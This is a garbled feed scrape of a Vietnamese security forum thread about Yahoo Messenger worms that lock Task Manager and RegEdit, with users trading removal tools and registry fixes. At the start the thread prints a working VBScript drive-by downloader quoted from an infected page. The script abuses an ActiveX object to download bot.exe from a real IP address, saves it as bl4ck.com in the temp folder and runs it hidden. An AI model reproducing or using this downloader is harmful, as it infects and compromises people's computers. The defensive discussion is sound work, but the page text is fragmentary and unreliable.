<![CDATA[Latest posts for the topic "Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy dl = "http://72.22.71.37/~camptong/bot.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="bl4ck.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <script type="text/javascript" language="JavaScript" // SRC="http://counter1.supercounter.org/cn2.php4?img=358&id=28882"> // </script> <br> <!-- START ADENGAGE.COM CODE 2.0 --> <STYLE> .ae_table_horiz { width:auto; height:auto; background-color:None; } .ae_td_horiz, .ae_image_td_horiz { padding-bottom: 4px; padding-top: 4px; padding-left: 3px; padding-right: 3px; vertical-align:top; } .ae_image_td_vert, .ae_image_td_horiz { text-align:right; padding-top:4px; padding-bottom:4px; padding-right: 4px; } .ae_image_td_sky { text-align:left; padding-top:4px; padding-bottom:0px; padding-right: 0px; } .ae_bb_td_horiz { padding-bottom: 4px; padding-top: 4px; padding-left: 3px; padding-right: 3px; vertical-align:top; } A.ae_title_horiz, A.ae_image_link_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: bold; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; } .ae_desc_horiz {font-family: Verdana,Sans-Serif; font-size: 11px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: #FF0066; } .ae_click_count_horiz {font-family: Verdana,Sans-Serif; font-size: 10px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: None; } A.ae_powered_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; } A.ae_yourlink_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: bold; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; } A.ae_title_horiz:hover, A.ae_powered_horiz:hover, A.ae_yourlink_horiz:hover, A.ae_image_link_horiz:hover { color: blue; text-decoration: Underline;} .ae_image_horiz { border-width:1px; border-color:#CC0000;} </STYLE> <SCRIPT LANGUAGE="JavaScript"> adengage_num_ads = 6; adengage_layout_type = "horiz"; adengage_show_your_ad_here = 1; adengage_yourlink_text = "See your link here"; adengage_show_powered_by = 0; adengage_show_click_count = 0; adengage_class_suffix = adengage_layout_type; adengage_arrow_text = ""; window.adengage_draw_break = 1; window.adengage_use_image = 0; window.adengage_image_size = 0; window.adengage_hide_desc = 0; </SCRIPT><SCRIPT SRC="http://adcode.adengage.com/js/ae_9725_adbox.js" LANGUAGE="JavaScript"></SCRIPT> <!-- END ADENGAGE.COM CODE 2.0 --> <!----- Start VN Adsense Code-----> <script language="javascript" type="text/javascript" src="http://vnadsense.com/bannercode/vnadsense.php?id1=bc10b5d35606596a378ebad5dae1c152&id=42b531854e1a49b4c83e478ca5658f99"></script> <!------End VN Adsense Code------> </body> </html>]]> /hvaonline/posts/list/3597.html#20872 /hvaonline/posts/list/3597.html#20872 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20875 /hvaonline/posts/list/3597.html#20875 GMT Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20876 /hvaonline/posts/list/3597.html#20876 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20886 /hvaonline/posts/list/3597.html#20886 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20895 /hvaonline/posts/list/3597.html#20895 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy http://nguyensi.nhan.googlepages.com/killnhutbe.zip chạy xong nhớ enter mới hoàn thành.]]> /hvaonline/posts/list/3597.html#20897 /hvaonline/posts/list/3597.html#20897 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20912 /hvaonline/posts/list/3597.html#20912 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

microware wrote:
thằng bạn nghịch ngợm làm máy em cũng bị dính. Nó khoá cả regedit và task manager mới đau chứ. Em xoá file .exe của nó rồi mà vẫn ko vào được regedit và task manager . Ai giúp với. 
các pác chạy tool của tôi ở trên thì sẽ giải quyết được tất cả các vấn đề do con này gây ra. tool của tôi sẽ làm như sau:(lại phải giải thích lại 1 lần nữa.. :cry: ) enable registry,enable task manager,enable hompage,delete những key do virus này tạo ra.]]>
/hvaonline/posts/list/3597.html#20914 /hvaonline/posts/list/3597.html#20914 GMT
Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

]]>
/hvaonline/posts/list/3597.html#20933 /hvaonline/posts/list/3597.html#20933 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy với lại có thêm cái gì trên desktop đó!noop quá kô biết   bạn nói có cái gì trên desktop ?tôi không hiểu bạn có thể nói rõ hơn.]]> /hvaonline/posts/list/3597.html#20945 /hvaonline/posts/list/3597.html#20945 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#20962 /hvaonline/posts/list/3597.html#20962 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21349 /hvaonline/posts/list/3597.html#21349 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21385 /hvaonline/posts/list/3597.html#21385 GMT Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21435 /hvaonline/posts/list/3597.html#21435 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21645 /hvaonline/posts/list/3597.html#21645 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21687 /hvaonline/posts/list/3597.html#21687 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21895 /hvaonline/posts/list/3597.html#21895 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy MÁY TUI KHÔNG BỊ DÍNH MÀ TƯỜNG THUẬT LẠI MÁY KHÁC máy em tui bị tui gửi cho cái file của james chạy và đã enter nhưng không diệt được Down tiếp cái của bác quảng mới nhất chạy 30 phút cũng thua. Restart lại vẫn bị Chả biết tools bác james và quảng thế nào mà làm ăn chả được máy đang chạy xp sp2 nhé ]]> /hvaonline/posts/list/3597.html#21988 /hvaonline/posts/list/3597.html#21988 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

channhua wrote:
báo cáo: MÁY TUI KHÔNG BỊ DÍNH MÀ TƯỜNG THUẬT LẠI MÁY KHÁC máy em tui bị tui gửi cho cái file của james chạy và đã enter nhưng không diệt được Down tiếp cái của bác quảng mới nhất chạy 30 phút cũng thua. Restart lại vẫn bị Chả biết tools bác james và quảng thế nào mà làm ăn chả được máy đang chạy xp sp2 nhé  
hình như đang xuất hiện biến thể mới tên này đã code lại thì phải(sao "bọn" này rãnh nhĩ :?:) ,tôi chưa có mẫu "con" u nói,ai có mẫu "con" này ko(file exe)? ]]>
/hvaonline/posts/list/3597.html#21989 /hvaonline/posts/list/3597.html#21989 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#21990 /hvaonline/posts/list/3597.html#21990 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

dqt wrote:
===> www.maybaygiay.tk và 1 con nữa là www.sanvuichoi.com . 
tool của tôi chỉ chuyên trị nhut.be,daokhuc.be,wWw.VuiVeVn.Hp.Ms .Tôi không biết thông tin gì về mấy con xuất phát từ hai trang trên.]]>
/hvaonline/posts/list/3597.html#21991 /hvaonline/posts/list/3597.html#21991 GMT
Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#22129 /hvaonline/posts/list/3597.html#22129 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#22220 /hvaonline/posts/list/3597.html#22220 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy tool của tôi chỉ chuyên trị nhut.be,daokhuc.be...tôi không biết thông tin gì về mấy con xuất phát từ hai trang này.  vậy mà tôpic bên kia bác james bảo chúng nó cùng 1 loại, cứ lấy về sài,nên tui lấy về sài :D BÁc viết lại fix thằng sânvuichoi đi]]> /hvaonline/posts/list/3597.html#22235 /hvaonline/posts/list/3597.html#22235 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

channhua wrote:
tool của tôi chỉ chuyên trị nhut.be,daokhuc.be...tôi không biết thông tin gì về mấy con xuất phát từ hai trang này. 
vậy mà tôpic bên kia bác james bảo chúng nó cùng 1 loại, cứ lấy về sài,nên tui lấy về sài :D BÁc viết lại fix thằng sânvuichoi đi 
mới đầu tôi kiểm tra trong trang wWw.VuiVeVn.Hp.Ms thì thấy là cùng loại còn mấy trang sau này thì tôi chưa có mẫu của nó.hình như tên viết "con" này code lại rồi đưa lên trang khác hay là những tên khác lấy source về rồi code lại nói chung sao bọn này rãnh quá :XD: ]]>
/hvaonline/posts/list/3597.html#22312 /hvaonline/posts/list/3597.html#22312 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy bác nào fix cái ]]> /hvaonline/posts/list/3597.html#22532 /hvaonline/posts/list/3597.html#22532 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

channhua wrote:
cái này tui đã kiểm tra kĩ trong registry và trong các file của yahoo không có cái nào có vuivevn mà nó vẫn bị dính cái chiêu set status và send msg cho group khi mới log in vào . pó tay thiệt, mặc dù không bị khoá homepage, registry, msconfig, taskmanager nhưng xoá nó không được các cách đã dùng không thành công: james tools, bkav newest tools, remove infect regis key in all regis hklc,hkcu..., search file in hdd, bực mình dùng tiếp spyware doctor, norton av nhưng vẫn dính . hic hic thằng này khó chịu thiệt bác nào fix cái  
không biết ở Việt Nam mình có ai chơi rootkit được chưa?vì nếu mà VR nó tích hợp rookit thì việc kiểm tra thông thường không thể phát hiện được. Tuy nhiên u vào đây kiểm tra thì sẽ phát hiện cái message status của nó ,rồi xoá nó đi khởi động máy lại xem còn không: HKEY_CURRENT_USER\Software\Yahoo\pager\profiles\[tên nick yahoo của mình]\Custom Msgs (không có dấu ngoặc [] khi gõ nick vào). CHÚC THÀNH CÔNG.]]>
/hvaonline/posts/list/3597.html#22576 /hvaonline/posts/list/3597.html#22576 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#22939 /hvaonline/posts/list/3597.html#22939 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#23034 /hvaonline/posts/list/3597.html#23034 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24052 /hvaonline/posts/list/3597.html#24052 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24062 /hvaonline/posts/list/3597.html#24062 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24075 /hvaonline/posts/list/3597.html#24075 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24109 /hvaonline/posts/list/3597.html#24109 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

chupichu wrote:
Cái này trước mình bị dính rồi, từ con bạn thân nó gửi, tưởng nó gửi cái gì ai ngờ click vào cái thì vù vù vù, thử dùng cách này để diệt. 1. Thoát hết các trình duyệt internet 2. Start/Run tìm : REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f hoặc Download cái này về http://windowsxp.mvps.org/reg/EnableTM.reg . bước này là để Enable Task Manager 3. Bấm Ctrl+Alt+Delete ,chuyển qua tag Processes chuột phải end process tắt hết mấy cái bl4ck.com 4. Vào search tìm kiếm các File có tên bl4ck và prefe rồi delete nó đi . 5. Bấm start - Run , chạy đoạn lệnh này : (REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f ) Cái này là để Enable cái RegEdit 6. Reset hết history, websetting 
Xin lỗi nhưng E có chút ý kiến. Nếu reg bị lock rồi, nó đòi tài khoản Admin thì làm sao mà chạy đc file *.reg nữa mà mở khoá. hic pó tay]]>
/hvaonline/posts/list/3597.html#24112 /hvaonline/posts/list/3597.html#24112 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

channhua wrote:
cái ieprotecter này sài good lắm không bắt được con autoIT nào mà bắt được file yupdate.exe nằm trong thư mục cài đặt của yahoo. Sau khi bắt được 1 life này ở chế độ tự động thì hết chả hiểu sao, chả liên wan gì đến autoIT ở đây, mặc dù đã scan hết roài. dù sao cũng cảm ơn anh LEVUHOANG 
lạ nhỉ, Hoàng test với yupdater.exe Yahoo 8.0 không báo lỗi. Còn việc không phát hiện ra AutoIt thì chắc máy bạn không bị nhiễm spim viết bằng AutoIt rồi ;) PS: Có phải cái vuive gì của bạn là ở đây ? hxxp://vuivevn.hp.ms/]]>
/hvaonline/posts/list/3597.html#24114 /hvaonline/posts/list/3597.html#24114 GMT
Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24116 /hvaonline/posts/list/3597.html#24116 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24121 /hvaonline/posts/list/3597.html#24121 GMT Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24332 /hvaonline/posts/list/3597.html#24332 GMT Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy /hvaonline/posts/list/3597.html#24440 /hvaonline/posts/list/3597.html#24440 GMT